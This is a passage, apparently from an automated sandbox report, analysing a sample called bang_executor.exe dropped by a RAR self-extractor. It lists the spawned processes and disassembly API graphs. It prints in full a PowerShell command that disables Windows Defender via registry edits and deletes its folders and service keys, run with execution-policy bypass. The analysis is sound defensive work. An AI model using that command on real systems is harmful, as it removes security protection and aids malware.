"HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" > test.ps1
                                      Imagebase:0x7ff6e6d80000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:16
                                      Start time:18:14:51
                                      Start date:15/02/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v NoDispAppearancePage /t REG_DWORD /d 1 /f
                                      Imagebase:0xee0000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:17
                                      Start time:18:14:51
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:18
                                      Start time:18:14:51
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\system32\cmd.exe" /C powershell.exe -ep bypass .\test.ps1;
                                      Imagebase:0x7ff6e6d80000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:19
                                      Start time:18:14:51
                                      Start date:15/02/2024
                                      Path:C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe"
                                      Imagebase:0x23b86100000
                                      File size:351'232 bytes
                                      MD5 hash:E1EAD094E52097B884389A8064B15E2B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:20
                                      Start time:18:14:51
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:21
                                      Start time:18:14:51
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:powershell.exe -ep bypass .\test.ps1;
                                      Imagebase:0x7ff788560000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:25
                                      Start time:18:14:52
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\WerFault.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\WerFault.exe -u -p 1236 -s 2324
                                      Imagebase:0x7ff768760000
                                      File size:570'736 bytes
                                      MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:26
                                      Start time:18:14:52
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\WerFault.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\WerFault.exe -u -p 7572 -s 2328
                                      Imagebase:0x7ff768760000
                                      File size:570'736 bytes
                                      MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:27
                                      Start time:18:14:54
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                      Imagebase:0x7ff693ab0000
                                      File size:496'640 bytes
                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:28
                                      Start time:18:14:59
                                      Start date:15/02/2024
                                      Path:C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe"
                                      Imagebase:0x1350ba50000
                                      File size:351'232 bytes
                                      MD5 hash:E1EAD094E52097B884389A8064B15E2B
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:30
                                      Start time:18:15:00
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\WerFault.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\WerFault.exe -u -p 7356 -s 2296
                                      Imagebase:0x7ff768760000
                                      File size:570'736 bytes
                                      MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:32
                                      Start time:18:15:07
                                      Start date:15/02/2024
                                      Path:C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe"
                                      Imagebase:0x21d60c70000
                                      File size:351'232 bytes
                                      MD5 hash:E1EAD094E52097B884389A8064B15E2B
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:34
                                      Start time:18:15:08
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\WerFault.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\WerFault.exe -u -p 7968 -s 2324
                                      Imagebase:0x7ff768760000
                                      File size:570'736 bytes
                                      MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:36
                                      Start time:18:15:18
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:9.6%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:13.4%
                                        Total number of Nodes:1721
                                        Total number of Limit Nodes:48
                                        execution_graph 26685 511850 51 API calls 25179 50d240 25180 50d24b 25179->25180 25182 50d274 25180->25182 25183 50d270 25180->25183 25185 50d55a 25180->25185 25192 50d2a0 DeleteCriticalSection 25182->25192 25186 50d2e8 _abort 5 API calls 25185->25186 25187 50d581 25186->25187 25188 50d59f InitializeCriticalSectionAndSpinCount 25187->25188 25189 50d58a 25187->25189 25188->25189 25190 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25189->25190 25191 50d5b6 25190->25191 25191->25180 25192->25183 25193 4eb45f 25200 4eb469 25193->25200 25194 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25196 4eb50b 25194->25196 25195 4eb5b6 25197 4eb5dd SetFilePointer 25195->25197 25198 4eb48d 25197->25198 25199 4eb5fa GetLastError 25197->25199 25198->25194 25199->25198 25200->25195 25200->25197 25200->25198 25202 4eb1e6 25200->25202 25203 4eb1ff 25202->25203 25205 4eb8c0 79 API calls 25203->25205 25204 4eb231 25204->25195 25205->25204 26688 50239f 9 API calls 2 library calls 25206 4ff05c 25214 4ff07f 25206->25214 25209 4ff717 25210 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25209->25210 25211 4ff732 25210->25211 25279 5013f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 25211->25279 25213 4ff741 25222 4fea83 _wcslen _wcsrchr 25214->25222 25237 4ffafc 25214->25237 25215 4fed57 SetWindowTextW 25215->25222 25217 4edd18 5 API calls 25217->25222 25221 4feb4b SetFileAttributesW 25224 4fec05 GetFileAttributesW 25221->25224 25235 4feb65 __cftof _wcslen 25221->25235 25222->25209 25222->25211 25222->25215 25222->25217 25222->25221 25222->25235 25259 4fc5dd GetCurrentDirectoryW 25222->25259 25261 4ec3de 11 API calls 25222->25261 25262 4ec367 FindClose 25222->25262 25263 4fd76e 76 API calls 3 library calls 25222->25263 25264 5066ae 25222->25264 25278 4fd5dd 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25222->25278 25224->25222 25225 4fec17 DeleteFileW 25224->25225 25225->25222 25228 4fec28 25225->25228 25230 4e4c00 _swprintf 51 API calls 25228->25230 25229 4fef35 GetDlgItem SetWindowTextW SendMessageW 25229->25235 25231 4fec48 GetFileAttributesW 25230->25231 25231->25228 25233 4fec5d MoveFileW 25231->25233 25232 4fef75 SendMessageW 25232->25222 25233->25222 25234 4fec75 MoveFileExW 25233->25234 25234->25222 25235->25222 25235->25232 25236 4febe1 SHFileOperationW 25235->25236 25260 4ed8ac 51 API calls 2 library calls 25235->25260 25277 4fd41c 100 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25235->25277 25236->25224 25241 4ffb06 __cftof _wcslen 25237->25241 25238 4ffd7e 25239 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25238->25239 25240 4ffd8f 25239->25240 25240->25222 25241->25238 25280 4ebccb 25241->25280 25244 4ffc73 ShellExecuteExW 25244->25238 25245 4ffc86 25244->25245 25248 4ffcb8 WaitForInputIdle 25245->25248 25249 4ffca3 IsWindowVisible 25245->25249 25250 4ffd0e CloseHandle 25245->25250 25247 4ffc6b 25247->25244 25252 50004d 6 API calls 25248->25252 25249->25248 25251 4ffcae ShowWindow 25249->25251 25254 4ffd1c 25250->25254 25251->25248 25253 4ffcd0 25252->25253 25253->25250 25255 4ffce3 GetExitCodeProcess 25253->25255 25254->25238 25256 4ffd75 ShowWindow 25254->25256 25255->25250 25257 4ffcf6 25255->25257 25256->25238 25257->25250 25259->25222 25260->25235 25261->25222 25262->25222 25263->25222 25265 50bb34 25264->25265 25266 50bb41 25265->25266 25267 50bb4c 25265->25267 25294 50bc8e 25266->25294 25269 50bb54 25267->25269 25275 50bb5d _abort 25267->25275 25272 50bafa _free 20 API calls 25269->25272 25270 50bb62 25301 50bc7b 20 API calls _abort 25270->25301 25271 50bb87 HeapReAlloc 25274 50bb49 25271->25274 25271->25275 25272->25274 25274->25222 25275->25270 25275->25271 25302 50a2ec 7 API calls 2 library calls 25275->25302 25277->25229 25278->25222 25279->25213 25284 4ebcdd 25280->25284 25283 4ed563 8 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25283->25247 25285 501590 25284->25285 25286 4ebcea GetFileAttributesW 25285->25286 25287 4ebd2c 25286->25287 25288 4ebd07 25286->25288 25289 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25287->25289 25290 4eda1e 6 API calls 25288->25290 25291 4ebcd4 25289->25291 25292 4ebd19 25290->25292 25291->25244 25291->25283 25292->25287 25293 4ebd1d GetFileAttributesW 25292->25293 25293->25287 25295 50bccc 25294->25295 25296 50bc9c _abort 25294->25296 25304 50bc7b 20 API calls _abort 25295->25304 25296->25295 25298 50bcb7 RtlAllocateHeap 25296->25298 25303 50a2ec 7 API calls 2 library calls 25296->25303 25298->25296 25299 50bcca 25298->25299 25299->25274 25301->25274 25302->25275 25303->25296 25304->25299 25307 500a46 25308 5009f4 25307->25308 25310 500d3a 25308->25310 25336 500a98 25310->25336 25312 500d4a 25313 500da7 25312->25313 25314 500dcb 25312->25314 25315 500cd8 DloadReleaseSectionWriteAccess 6 API calls 25313->25315 25317 500e43 LoadLibraryExA 25314->25317 25318 500eb6 25314->25318 25319 500ea4 25314->25319 25330 500f72 25314->25330 25316 500db2 RaiseException 25315->25316 25331 500fa0 25316->25331 25317->25319 25320 500e56 GetLastError 25317->25320 25321 500f14 GetProcAddress 25318->25321 25318->25330 25319->25318 25322 500eaf FreeLibrary 25319->25322 25323 500e69 25320->25323 25324 500e7f 25320->25324 25326 500f24 GetLastError 25321->25326 25321->25330 25322->25318 25323->25319 25323->25324 25325 500cd8 DloadReleaseSectionWriteAccess 6 API calls 25324->25325 25327 500e8a RaiseException 25325->25327 25328 500f37 25326->25328 25327->25331 25328->25330 25332 500cd8 DloadReleaseSectionWriteAccess 6 API calls 25328->25332 25345 500cd8 25330->25345 25331->25308 25333 500f58 RaiseException 25332->25333 25334 500a98 ___delayLoadHelper2@8 6 API calls 25333->25334 25335 500f6f 25334->25335 25335->25330 25337 500aa4 25336->25337 25338 500aca 25336->25338 25353 500b41 25337->25353 25338->25312 25340 500aa9 25341 500ac5 25340->25341 25356 500c6a 25340->25356 25361 500acb GetModuleHandleW GetProcAddress GetProcAddress 25341->25361 25344 500d13 25344->25312 25346 500cea 25345->25346 25347 500d0c 25345->25347 25348 500b41 DloadReleaseSectionWriteAccess 3 API calls 25346->25348 25347->25331 25349 500cef 25348->25349 25350 500d07 25349->25350 25351 500c6a DloadProtectSection 3 API calls 25349->25351 25364 500d0e GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 25350->25364 25351->25350 25362 500acb GetModuleHandleW GetProcAddress GetProcAddress 25353->25362 25355 500b46 25355->25340 25357 500c7f DloadProtectSection 25356->25357 25358 500cba VirtualProtect 25357->25358 25359 500c85 25357->25359 25363 500b80 VirtualQuery GetSystemInfo 25357->25363 25358->25359 25359->25341 25361->25344 25362->25355 25363->25358 25364->25347 26691 508870 QueryPerformanceFrequency QueryPerformanceCounter 25376 50067c 14 API calls ___delayLoadHelper2@8 26763 513665 21 API calls 2 library calls 26696 4e1075 44 API calls 26764 502610 RaiseException std::_Xinvalid_argument _com_error::_com_error 26698 4fc000 28 API calls 26700 4e1025 29 API calls 26701 4e4c20 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26769 4e2620 97 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26770 50ca20 21 API calls 2 library calls 26706 4fd8c0 98 API calls 26776 4f82d0 138 API calls __InternalCxxFrameHandler 26708 50ccf0 31 API calls 2 library calls 26777 50caf0 71 API calls _free 26778 512ef0 IsProcessorFeaturePresent 26709 501cf3 20 API calls 26710 4e24e0 26 API calls std::bad_exception::bad_exception 25378 4fdae0 25379 4fdaf2 25378->25379 25554 4e1366 25379->25554 25382 4fdb5c 25385 4fdb76 25382->25385 25388 4fdb6d 25382->25388 25389 4fdbd0 25382->25389 25383 4fe250 25656 4ff9ee 25383->25656 25384 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25387 4fe555 25384->25387 25385->25384 25392 4fdbad 25388->25392 25393 4fdb71 25388->25393 25391 4fdc63 GetDlgItemTextW 25389->25391 25399 4fdbe6 25389->25399 25391->25392 25396 4fdca0 25391->25396 25392->25385 25401 4fdc94 EndDialog 25392->25401 25393->25385 25405 4f0597 53 API calls 25393->25405 25394 4fe26b SendMessageW 25395 4fe279 25394->25395 25397 4fe293 GetDlgItem SendMessageW 25395->25397 25398 4fe282 SendDlgItemMessageW 25395->25398 25402 4fdca9 25396->25402 25403 4fdcb5 GetDlgItem 25396->25403 25675 4fc5dd GetCurrentDirectoryW 25397->25675 25398->25397 25404 4f0597 53 API calls 25399->25404 25401->25385 25402->25392 25416 4fe196 25402->25416 25407 4fdcec SetFocus 25403->25407 25408 4fdcc9 SendMessageW SendMessageW 25403->25408 25409 4fdc03 SetDlgItemTextW 25404->25409 25410 4fdb90 25405->25410 25406 4fe2c3 GetDlgItem 25411 4fe2e6 SetWindowTextW 25406->25411 25412 4fe2e0 25406->25412 25413 4fdcfc 25407->25413 25427 4fdd08 25407->25427 25408->25407 25414 4fdc0e 25409->25414 25699 4e1273 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25410->25699 25676 4fcb49 GetClassNameW 25411->25676 25412->25411 25418 4f0597 53 API calls 25413->25418 25414->25385 25421 4fdc1b GetMessageW 25414->25421 25419 4f0597 53 API calls 25416->25419 25422 4fdd06 25418->25422 25424 4fe1a6 SetDlgItemTextW 25419->25424 25421->25385 25426 4fdc32 IsDialogMessageW 25421->25426 25564 4ff7fc 25422->25564 25423 4fe531 SetDlgItemTextW 25423->25385 25429 4fe1ba 25424->25429 25426->25414 25431 4fdc41 TranslateMessage DispatchMessageW 25426->25431 25432 4f0597 53 API calls 25427->25432 25436 4f0597 53 API calls 25429->25436 25431->25414 25434 4fdd3f 25432->25434 25438 4e4c00 _swprintf 51 API calls 25434->25438 25435 4fdd77 25440 4fdd96 25435->25440 25445 4ebccb 8 API calls 25435->25445 25469 4fe1dd _wcslen 25436->25469 25437 4fe331 25442 4fe361 25437->25442 25443 4f0597 53 API calls 25437->25443 25438->25422 25588 4ebaf1 25440->25588 25441 4fea07 122 API calls 25441->25437 25448 4fea07 122 API calls 25442->25448 25487 4fe419 25442->25487 25446 4fe344 SetDlgItemTextW 25443->25446 25450 4fdd8c 25445->25450 25451 4f0597 53 API calls 25446->25451 25454 4fe37c 25448->25454 25449 4fe4c0 25455 4fe4c9 EnableWindow 25449->25455 25456 4fe4d2 25449->25456 25450->25440 25576 4fcebf 25450->25576 25458 4fe358 SetDlgItemTextW 25451->25458 25452 4fddaf GetLastError 25453 4fddba 25452->25453 25599 4fcbb6 SetCurrentDirectoryW 25453->25599 25466 4fe38e 25454->25466 25486 4fe3b3 25454->25486 25455->25456 25461 4fe4ef 25456->25461 25709 4e1323 GetDlgItem KiUserCallbackDispatcher 25456->25709 25457 4fe22e 25460 4f0597 53 API calls 25457->25460 25458->25442 25460->25385 25464 4fe516 25461->25464 25476 4fe50e SendMessageW 25461->25476 25464->25385 25477 4f0597 53 API calls 25464->25477 25465 4fddce 25471 4fdde5 25465->25471 25472 4fddd7 GetLastError 25465->25472 25707 4fbe55 31 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25466->25707 25467 4fe40c 25470 4fea07 122 API calls 25467->25470 25468 4fe4e5 25710 4e1323 GetDlgItem KiUserCallbackDispatcher 25468->25710 25469->25457 25475 4f0597 53 API calls 25469->25475 25470->25487 25479 4fde5c 25471->25479 25481 4fddf5 GetTickCount 25471->25481 25482 4fde6b 25471->25482 25472->25471 25483 4fe211 25475->25483 25476->25464 25480 4fdb97 25477->25480 25478 4fe3a7 25478->25486 25479->25482 25485 4fe097 25479->25485 25480->25385 25480->25423 25494 4e4c00 _swprintf 51 API calls 25481->25494 25491 4fe03c 25482->25491 25492 4fde84 GetModuleFileNameW 25482->25492 25493 4fe032 25482->25493 25488 4e4c00 _swprintf 51 API calls 25483->25488 25484 4fe4a1 25708 4fbe55 31 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25484->25708 25610 4e1341 GetDlgItem ShowWindow 25485->25610 25486->25467 25495 4fea07 122 API calls 25486->25495 25487->25449 25487->25484 25498 4f0597 53 API calls 25487->25498 25488->25457 25501 4f0597 53 API calls 25491->25501 25701 4f12bc 82 API calls 25492->25701 25493->25392 25493->25491 25497 4fde12 25494->25497 25502 4fe3e1 25495->25502 25496 4fe0a7 25611 4e1341 GetDlgItem ShowWindow 25496->25611 25600 4eb01e 25497->25600 25498->25487 25499 4fe4bd 25499->25449 25505 4fe046 25501->25505 25502->25467 25507 4fe3ea DialogBoxParamW 25502->25507 25504 4fdeac 25509 4e4c00 _swprintf 51 API calls 25504->25509 25506 4e4c00 _swprintf 51 API calls 25505->25506 25511 4fe064 25506->25511 25507->25392 25507->25467 25508 4fe0b1 25513 4f0597 53 API calls 25508->25513 25510 4fdece CreateFileMappingW 25509->25510 25514 4fdf2c GetCommandLineW 25510->25514 25548 4fdfa3 __InternalCxxFrameHandler 25510->25548 25522 4f0597 53 API calls 25511->25522 25515 4fe0bb SetDlgItemTextW 25513->25515 25518 4fdf3d 25514->25518 25612 4e1341 GetDlgItem ShowWindow 25515->25612 25517 4fdfae ShellExecuteExW 25533 4fdfc9 25517->25533 25702 4fd705 SHGetMalloc 25518->25702 25519 4fde3f GetLastError 25520 4fde4a 25519->25520 25525 4eaf2f 80 API calls 25520->25525 25528 4fe07e 25522->25528 25524 4fe0cd SetDlgItemTextW GetDlgItem 25526 4fe0ea GetWindowLongW SetWindowLongW 25524->25526 25527 4fe102 25524->25527 25525->25479 25526->25527 25613 4fea07 25527->25613 25529 4fdf59 25703 4fd705 SHGetMalloc 25529->25703 25532 4fe110 25536 4fea07 122 API calls 25532->25536 25537 4fdfde WaitForInputIdle 25533->25537 25538 4fe00c 25533->25538 25534 4fdf65 25704 4fd705 SHGetMalloc 25534->25704 25539 4fe11e 25536->25539 25540 4fdff3 25537->25540 25538->25493 25545 4fe022 UnmapViewOfFile CloseHandle 25538->25545 25644 4ffdf7 25539->25644 25540->25538 25544 4fdff8 Sleep 25540->25544 25541 4fdf71 25705 4f136b 82 API calls 25541->25705 25544->25538 25544->25540 25545->25493 25547 4fdf82 MapViewOfFile 25547->25548 25548->25517 25555 4e13c8 25554->25555 25557 4e136f 25554->25557 25712 4f021d GetWindowLongW SetWindowLongW 25555->25712 25558 4e13d5 25557->25558 25711 4f0244 62 API calls 3 library calls 25557->25711 25558->25382 25558->25383 25558->25385 25560 4e1391 25560->25558 25561 4e13a4 GetDlgItem 25560->25561 25561->25558 25562 4e13b4 25561->25562 25562->25558 25563 4e13ba SetWindowTextW 25562->25563 25563->25558 25713 4fd864 PeekMessageW 25564->25713 25567 4ff86e SendMessageW SendMessageW 25569 4ff8ae 25567->25569 25570 4ff8cd SendMessageW SendMessageW SendMessageW 25567->25570 25568 4ff836 25573 4ff841 ShowWindow SendMessageW SendMessageW 25568->25573 25569->25570 25571 4ff924 SendMessageW 25570->25571 25572 4ff901 SendMessageW 25570->25572 25574 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25571->25574 25572->25571 25573->25567 25575 4fdd62 25574->25575 25575->25435 25700 4fff24 5 API calls 2 library calls 25575->25700 25718 4fd392 GetCurrentProcess OpenProcessToken 25576->25718 25578 4fcee1 25579 4fcee9 SetEntriesInAclW 25578->25579 25582 4fcf75 25578->25582 25581 4fcf2a InitializeSecurityDescriptor 25579->25581 25579->25582 25580 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25583 4fcf82 25580->25583 25584 4fcf39 SetSecurityDescriptorDacl 25581->25584 25585 4fcf67 25581->25585 25582->25580 25583->25440 25584->25585 25586 4fcf4c CreateDirectoryW 25584->25586 25585->25582 25587 4fcf6c LocalFree 25585->25587 25586->25585 25587->25582 25592 4ebafb 25588->25592 25589 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25590 4ebbf0 25589->25590 25590->25452 25590->25453 25591 4ebba8 25593 4ebee1 13 API calls 25591->25593 25595 4ebbd0 25591->25595 25592->25591 25594 4ebbf9 25592->25594 25592->25595 25725 4ebee1 25592->25725 25593->25595 25740 5013f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 25594->25740 25595->25589 25598 4ebbfe 25599->25465 25601 4eb028 25600->25601 25602 4eb096 CreateFileW 25601->25602 25603 4eb08d 25601->25603 25602->25603 25604 4eb0dd 25603->25604 25605 4eda1e 6 API calls 25603->25605 25608 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25604->25608 25606 4eb0c2 25605->25606 25606->25604 25607 4eb0c6 CreateFileW 25606->25607 25607->25604 25609 4eb111 25608->25609 25609->25519 25609->25520 25610->25496 25611->25508 25612->25524 25614 4fea19 25613->25614 25615 4ff717 25614->25615 25751 4fd5dd 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25614->25751 25616 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25615->25616 25618 4ff732 25616->25618 25618->25532 25759 5013f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 25618->25759 25620 4ff741 25622 4fed57 SetWindowTextW 25628 4fea7c _wcslen _wcsrchr 25622->25628 25624 4edd18 5 API calls 25624->25628 25626 5066ae 22 API calls 25626->25628 25628->25615 25628->25618 25628->25622 25628->25624 25628->25626 25629 4feb4b SetFileAttributesW 25628->25629 25632 4feb65 __cftof _wcslen 25628->25632 25752 4fc5dd GetCurrentDirectoryW 25628->25752 25754 4ec3de 11 API calls 25628->25754 25755 4ec367 FindClose 25628->25755 25756 4fd76e 76 API calls 3 library calls 25628->25756 25758 4fd5dd 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25628->25758 25631 4fec05 GetFileAttributesW 25629->25631 25629->25632 25631->25628 25633 4fec17 DeleteFileW 25631->25633 25632->25628 25639 4fef75 SendMessageW 25632->25639 25643 4febe1 SHFileOperationW 25632->25643 25753 4ed8ac 51 API calls 2 library calls 25632->25753 25757 4fd41c 100 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25632->25757 25633->25628 25640 4fec28 25633->25640 25636 4fef35 GetDlgItem SetWindowTextW SendMessageW 25636->25632 25637 4e4c00 _swprintf 51 API calls 25638 4fec48 GetFileAttributesW 25637->25638 25638->25640 25641 4fec5d MoveFileW 25638->25641 25639->25628 25640->25637 25641->25628 25642 4fec75 MoveFileExW 25641->25642 25642->25628 25643->25631 25645 4ffe13 25644->25645 25760 4f26df 25645->25760 25647 4ffe59 25764 4e8ddf 25647->25764 25649 4ffeb7 25774 4e8ff5 25649->25774 25657 4ff9f8 25656->25657 25658 4fc556 4 API calls 25657->25658 25659 4ffa13 25658->25659 25660 4ffa1b GetWindow 25659->25660 25663 4ffae1 25659->25663 25660->25663 25665 4ffa34 25660->25665 25661 5010f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25662 4fe256 25661->25662 25662->25394 25662->25395 25663->25661 25664 4ffa41 GetClassNameW 25664->25665 25665->25663 25665->25664 25666 4ffac9 GetWindow 25665->25666 25667 4ffa65 GetWindowLongW 25665->25667 25666->25663 25666->25665 25667->25666 25668 4ffa75 SendMessageW 25667->25668 25668->25666 25669 4ffa8b GetObjectW 25668->25669 26323 4fc595 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25669->26323 25671 4ffaa2 26324 4fc574 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25671->26324 26325 4fc79c 13 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25671->26325 25674 4ffab3 SendMessageW DeleteObject 25674->25666 25675->25406 25677 4fcb99 25676->25677 25678 4fcb74 25676->25678 25679 4fcb9e SHAutoComplete 25677->25679 